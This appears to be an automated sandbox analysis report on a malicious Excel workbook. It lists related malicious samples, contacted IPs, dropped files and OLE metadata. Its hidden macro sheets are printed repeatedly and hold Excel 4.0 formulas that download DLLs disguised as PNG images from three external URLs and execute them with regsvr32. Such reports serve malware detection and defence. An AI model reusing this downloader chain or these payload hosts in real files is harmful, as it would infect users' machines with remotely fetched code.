                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-1461729946.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 192.185.17.132
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 162.241.62.76
                                                                      https://alswailem-sa.com/ameu/tqvemutoaoupeatuclrsnGet hashmaliciousBrowse
                                                                      • 108.167.180.86
                                                                      Cms-cmno-Policy.htmlGet hashmaliciousBrowse
                                                                      • 162.240.67.140
                                                                      WILDCARD-ASWildcardUKLimitedGBW-706528590.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      https://keavamethod.com/as/ermulobaerrGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1461729946.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      FvISfX7teS.exeGet hashmaliciousBrowse
                                                                      • 185.27.134.94
                                                                      SYMhw4SyRn.exeGet hashmaliciousBrowse
                                                                      • 185.27.134.94
                                                                      voxM26V0rA.exeGet hashmaliciousBrowse
                                                                      • 185.27.134.94
                                                                      https://serverchem.com/opendzmabns/home/Get hashmaliciousBrowse
                                                                      • 31.22.4.116
                                                                      Fake.Mail.htmlGet hashmaliciousBrowse
                                                                      • 31.22.4.141
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      7dcce5b76c8b17472d024758970a406bW-706528590.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      W-1178425533.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      W-1245276572.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      W-1277599093.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      W-1461729946.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      W-1659917236.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      W-1826010922.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      W-433343185.xlsbGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      Commande HILTI MAROC.xlsxGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      Proof of payment.docGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      OPOLTRANS 112022.docGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      Proof of Payment.docGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      RFQ 37 - DR104505 - 9404864 -ArcelorMittal.xlsxGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      eevlx.xlsGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      OPOLTRANS 112022.docxGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      Pago.xlsxGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      MIL0003846453.xlsmGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      Eastern Engineering Remittance 04.11.2022.xlsxGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      QUOTE Intelservice SAS.xlsxGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      KK1048A-paid.docxGet hashmaliciousBrowse
                                                                      • 31.22.4.117
                                                                      • 192.185.17.132
                                                                      • 162.241.62.76
                                                                      No context
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):6144552
                                                                      Entropy (8bit):2.9572715976810535
                                                                      Encrypted:false
                                                                      SSDEEP:6144:D6u5tA6lAx6k/X6xL/d4EXvTmOAMamGMW1B6u5tA6lAx6k/X6xL/d4EXvTmOAMa5:DX/AMq15X/AMq1t
                                                                      MD5:523C247BCEF4FF8747015C252C8A9029
                                                                      SHA1:CF123936AEEDD0B1EE9FCD80A93F0D5DB671E10D
                                                                      SHA-256:3F0F6BB70F3D65DCC8D248D78AC320BCC22B1148EA5FDD2C1043065D03460133
                                                                      SHA-512:7C91E2482EA91925D0773E7E23A02F7E1CDD2CF43E5EA6FDA9FA82697E34DF519F14146E383AF10BA1980B059FACEF28BE67C55CC32DD04DE9702EBC84BF4482
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:....l............................}...N.. EMF....(.].....................V.......X....................?......F...........GDIC.........eW ..............@p....!p..........................................!p..A. ... ...............(....... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:JPEG image data, baseline, precision 8, 1280x800, frames 3
                                                                      Category:dropped
                                                                      Size (bytes):214051
                                                                      Entropy (8bit):7.738874694802587
                                                                      Encrypted:false
                                                                      SSDEEP:3072:Yaz6kqB/EsWcXCJGbtyntvHGiYMnIOwKSIYFUQRLmTDBwszHbcOQafZD/:A5nRXCw+DnIdFUKmTDBwsz7c1yD/
                                                                      MD5:0F96E1C9A4BCCA8DB381A2316A435575
                                                                      SHA1:D480958CC7D25185BC7B762496701C1A47A15B22
                                                                      SHA-256:E2A3213A6690EFEDE67D20432F756BFC53FE6FCB1F14A4B1B64BC9A72E11BD94
                                                                      SHA-512:19045F11C973BF947E18970E662982062B694AD43F0F6C62F756F39B3AB2A341505C209EBFE2A1AA5E682AA21A727DE95F407AB458CD2B39EEEACEB5E0D8D480
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:..................................................................................................................................................Adobe.d........... ..........................................................................................................ST..!......."1VXd......2Ar.#9Qaw.$38qvxy.....467:BCUY.%......&'JRu........5HWs.................................!..1......."AQRSU...2TVaq.....#7B8uv.....$356bcest......4Crw...%...F..D................?...:....q.#..../.......+`.Jw...'...n....)..K|Hs.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^.......$.^.!....+u..>yO..[.A.....O`.^..
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):1536
                                                                      Entropy (8bit):1.1464700112623651
                                                                      Encrypted:false
                                                                      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                      MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                      SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                      SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                      SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):9273344
                                                                      Entropy (8bit):2.958637995674597
                                                                      Encrypted:false
                                                                      SSDEEP:6144:u6u5tA6lAx6k/X6xL/d4EXvTmOAMamGMW1U6u5tA6lAx6k/X6xL/d4EXvTmOAMat:uX/AMq1cX/AMq1cX/AMq1
                                                                      MD5:79603B730C3DACD515209EDC2F631D38
                                                                      SHA1:534674A86BD510BA26F9FCB6E9E4014F5107728D
                                                                      SHA-256:7A3B725A4D2DC6EFB09F8A67F74781B9738AED04DC919997544296B9CC404316
                                                                      SHA-512:4E72574955290863ED1390FD2476AB9FA290CC5BE4797F22CB320313880BD402B326EB4BD887F6E3278CFE6547E68F093BE0DE14E992E1862E8D553CFD06EEA0
                                                                      Malicious:false
                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):165
                                                                      Entropy (8bit):1.4377382811115937
                                                                      Encrypted:false
                                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                      Malicious:true
                                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      File type:Microsoft Excel 2007+
                                                                      Entropy (8bit):7.951344840556028
                                                                      TrID:
                                                                      • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                      • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                      • ZIP compressed archive (8000/1) 5.73%
                                                                      File name:W-938893460.xlsb
                                                                      File size:1057585
                                                                      MD5:899517f64b531fa84462eb53bd071b50
                                                                      SHA1:16fa83c16a17cc47bfd5424d60084bf70e2ce266
                                                                      SHA256:1d7c459e0c8e7201933dec1ae217ba4f148838aca3ad10f9e2ba869d50e57e49
                                                                      SHA512:d9e63735b54948e82adabc9cb357d98cb058e6e0dbb940649785e9d288e6503472c7ce114b2eb19c77eda3bb205721c844c40ba9eec4ce828cfe560597a3313d
                                                                      SSDEEP:24576:O9vBKAnpis3QXPH5sjl+opcMrAm9vBKAnpis3Q+9vBKAnpis3QSVLFUN:C5KA65VSrX5KAV5KAVNFK
                                                                      TLSH:1A25F155A9690121D4FD313932008E409723384E90A4FDDE1E9B2EFF7B99978AC25BFC
                                                                      File Content Preview:PK..........!.7.^*....^.......[Content_Types].xml ...(.........................................................................................................................................................................................................
                                                                      Icon Hash:e4e2ea8aa4b4b4b4
                                                                      Document Type:OpenXML
                                                                      Number of OLE Files:3
                                                                      Has Summary Info:
                                                                      Application Name:
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:False
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:False
                                                                      Author:Posik
                                                                      Last Saved By:RHfdh
                                                                      Create Time:2015-06-05T18:19:34Z
                                                                      Last Saved Time:2022-04-13T08:02:18Z
                                                                      Creating Application:Microsoft Excel
                                                                      Security:0
                                                                      Thumbnail Scaling Desired:false
                                                                      Company:
                                                                      Contains Dirty Links:false
                                                                      Shared Document:false
                                                                      Changed Hyperlinks:false
                                                                      Application Version:16.0300
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      File Type:data
                                                                      Stream Size:77
                                                                      Entropy:2.95477953387
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:\x1Ole
                                                                      File Type:data
                                                                      Stream Size:101
                                                                      Entropy:3.4182168343
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 .
                                                                      Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00
                                                                      General
                                                                      Stream Path:\x1Ole10Native
                                                                      File Type:data
                                                                      Stream Size:3072068
                                                                      Entropy:2.9569834776
                                                                      Base64 Encoded:True
                                                                      Data ASCII:@ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                      Name:PVVEBZ
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PVVEBZ4False0Falsepre9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)26,7,=GOTO(PDGLGF!D3)
                                                                      Name:PDGLGF
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PDGLGF4False0Falsepost4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)13,3,=EXEC("regsvr32 C:\Uduw\ehxw3.dll")15,3,=RETURN()
                                                                      Name:PDGLGF
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PDGLGF4False0Falsepre4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)
                                                                      Name:Btd
                                                                      Type:3
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      Btd3False0Falsepost12,3,=CHAR(Fhgyk!L52)
                                                                      Name:Btd
                                                                      Type:3
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      Btd3False0Falsepre12,3,=CHAR(Fhgyk!L52)
                                                                      Name:PVVEBZ
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PVVEBZ4False0Falsepost9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)12,7,=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)14,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)16,7,=EXEC("regsvr32 C:\Uduw\ehxw1.dll")18,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)20,7,=EXEC("regsvr32 C:\Uduw\ehxw2.dll")22,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)26,7,=GOTO(PDGLGF!D3)
                                                                      Has Summary Info:
                                                                      Application Name:
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:False
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:False
                                                                      Author:Posik
                                                                      Last Saved By:RHfdh
                                                                      Create Time:2015-06-05T18:19:34Z
                                                                      Last Saved Time:2022-04-13T08:02:18Z
                                                                      Creating Application:Microsoft Excel
                                                                      Security:0
                                                                      Thumbnail Scaling Desired:false
                                                                      Company:
                                                                      Contains Dirty Links:false
                                                                      Shared Document:false
                                                                      Changed Hyperlinks:false
                                                                      Application Version:16.0300
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      File Type:data
                                                                      Stream Size:77
                                                                      Entropy:2.95477953387
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:\x1Ole
                                                                      File Type:data
                                                                      Stream Size:101
                                                                      Entropy:3.4182168343
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 .
                                                                      Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00
                                                                      General
                                                                      Stream Path:\x1Ole10Native
                                                                      File Type:data
                                                                      Stream Size:3072068
                                                                      Entropy:2.9569834776
                                                                      Base64 Encoded:True
                                                                      Data ASCII:@ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                      Name:PVVEBZ
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PVVEBZ4False0Falsepre9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)26,7,=GOTO(PDGLGF!D3)
                                                                      Name:PDGLGF
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PDGLGF4False0Falsepost4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)13,3,=EXEC("regsvr32 C:\Uduw\ehxw3.dll")15,3,=RETURN()
                                                                      Name:PDGLGF
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PDGLGF4False0Falsepre4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)
                                                                      Name:Btd
                                                                      Type:3
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      Btd3False0Falsepost12,3,=CHAR(Fhgyk!L52)
                                                                      Name:Btd
                                                                      Type:3
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      Btd3False0Falsepre12,3,=CHAR(Fhgyk!L52)
                                                                      Name:PVVEBZ
                                                                      Type:4
                                                                      Final:False
                                                                      Visible:False
                                                                      Protected:False
                                                                      PVVEBZ4False0Falsepost9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)12,7,=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)14,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)16,7,=EXEC("regsvr32 C:\Uduw\ehxw1.dll")18,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)20,7,=EXEC("regsvr32 C:\Uduw\ehxw2.dll")22,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)26,7,=GOTO(PDGLGF!D3)
                                                                      Has Summary Info:
                                                                      Application Name:
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:False
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:False
                                                                      Author:Posik
                                                                      Last Saved By:RHfdh
                                                                      Create Time:2015-06-05T18:19:34Z
                                                                      Last Saved Time:2022-04-13T08:02:18Z
                                                                      Creating Application:Microsoft Excel
                                                                      Security:0
                                                                      Thumbnail Scaling Desired:false
                                                                      Company:
                                                                      Contains Dirty Links:false
                                                                      Shared Document:false
                                                                      Changed Hyperlinks:false
                                                                      Application Version:16.0300
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      File Type:data
                                                                      Stream Size:77
                                                                      Entropy:2.95477953387
                                                                      Base64 Encoded:False
